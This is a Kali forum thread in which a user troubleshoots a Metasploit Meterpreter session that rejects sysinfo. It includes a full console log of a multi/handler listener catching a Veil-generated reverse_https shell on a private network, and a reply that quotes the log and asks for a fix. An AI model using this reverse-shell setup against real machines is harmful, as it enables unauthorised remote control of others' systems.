Results 1 to 2 of 2

Thread: Metasploit Meterpreter Command not Found

  1. #1

    Exclamation Metasploit Meterpreter Command not Found

    Hello Everybody,
    This is the first time i am asking a question in kali forum.

    The problem is with meta-sploit framework. Its saying command not found for most of the valid command like sysinfo.
    The payload is genereted using veil written in go language. Its reverse_https.
    I checked the LPORT and LHOST are correctly configured.
    I updated the metasploit framework using apt-get but still the problem is there.



    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > options


    Module options (exploit/multi/handler):


    Name Current Setting Required Description
    ---- --------------- -------- -----------




    Exploit target:


    Id Name
    -- ----
    0 Wildcard Target




    msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https
    PAYLOAD => windows/meterpreter/reverse_https
    msf5 exploit(multi/handler) > set LHOST 192.168.29.138
    LHOST => 192.168.29.138
    msf5 exploit(multi/handler) > set LPORT 8080
    LPORT => 8080
    msf5 exploit(multi/handler) > options


    Module options (exploit/multi/handler):


    Name Current Setting Required Description
    ---- --------------- -------- -----------




    Payload options (windows/meterpreter/reverse_https):


    Name Current Setting Required Description
    ---- --------------- -------- -----------
    EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
    LHOST 192.168.29.138 yes The local listener hostname
    LPORT 8080 yes The local listener port
    LURI no The HTTP Path




    Exploit target:


    Id Name
    -- ----
    0 Wildcard Target




    msf5 exploit(multi/handler) > exploit

    [*] Started HTTPS reverse handler on https://192.168.29.138:8080[*] https://192.168.29.138:8080 handling request from 192.168.29.228; (UUID: htb7f2az) Staging x86 payload (181337 bytes) ...[*] Meterpreter session 1 opened (192.168.29.138:8080 -> 192.168.29.228:50624) at 2020-04-13 07:30:52 -0400
    ^C[-] Exploit failed [user-interrupt]: Interrupt
    [-] exploit: Interrupted
    msf5 exploit(multi/handler) > sessions -l


    Active sessions
    ===============


    Id Name Type Information Connection
    -- ---- ---- ----------- ----------
    1 meterpreter x86/windows 192.168.29.138:8080 -> 192.168.29.228:50624 (192.168.29.228)


    msf5 exploit(multi/handler) > sessions -i 1[*] Starting interaction with 1...


    meterpreter > sysinfo
    [-] Unknown command: sysinfo.
    meterpreter >

  2. #2
    Join Date
    2020-May
    Posts
    1

    Me too

    Did you ever find the solution?

    Quote Originally Posted by bluewarroir2457 View Post
    Hello Everybody,
    This is the first time i am asking a question in kali forum.

    The problem is with meta-sploit framework. Its saying command not found for most of the valid command like sysinfo.
    The payload is genereted using veil written in go language. Its reverse_https.
    I checked the LPORT and LHOST are correctly configured.
    I updated the metasploit framework using apt-get but still the problem is there.



    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > options


    Module options (exploit/multi/handler):


    Name Current Setting Required Description
    ---- --------------- -------- -----------




    Exploit target:


    Id Name
    -- ----
    0 Wildcard Target




    msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https
    PAYLOAD => windows/meterpreter/reverse_https
    msf5 exploit(multi/handler) > set LHOST 192.168.29.138
    LHOST => 192.168.29.138
    msf5 exploit(multi/handler) > set LPORT 8080
    LPORT => 8080
    msf5 exploit(multi/handler) > options


    Module options (exploit/multi/handler):


    Name Current Setting Required Description
    ---- --------------- -------- -----------




    Payload options (windows/meterpreter/reverse_https):


    Name Current Setting Required Description
    ---- --------------- -------- -----------
    EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
    LHOST 192.168.29.138 yes The local listener hostname
    LPORT 8080 yes The local listener port
    LURI no The HTTP Path




    Exploit target:


    Id Name
    -- ----
    0 Wildcard Target




    msf5 exploit(multi/handler) > exploit
    [*] Started HTTPS reverse handler on https://192.168.29.138:8080[*] https://192.168.29.138:8080 handling request from 192.168.29.228; (UUID: htb7f2az) Staging x86 payload (181337 bytes) ...[*] Meterpreter session 1 opened (192.168.29.138:8080 -> 192.168.29.228:50624) at 2020-04-13 07:30:52 -0400
    ^C[-] Exploit failed [user-interrupt]: Interrupt
    [-] exploit: Interrupted
    msf5 exploit(multi/handler) > sessions -l


    Active sessions
    ===============


    Id Name Type Information Connection
    -- ---- ---- ----------- ----------
    1 meterpreter x86/windows 192.168.29.138:8080 -> 192.168.29.228:50624 (192.168.29.228)


    msf5 exploit(multi/handler) > sessions -i 1[*] Starting interaction with 1...


    meterpreter > sysinfo
    [-] Unknown command: sysinfo.
    meterpreter >

Similar Threads

  1. Metasploit meterpreter
    By nix in forum General Archive
    Replies: 5
    Last Post: 2013-05-25, 04:29

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •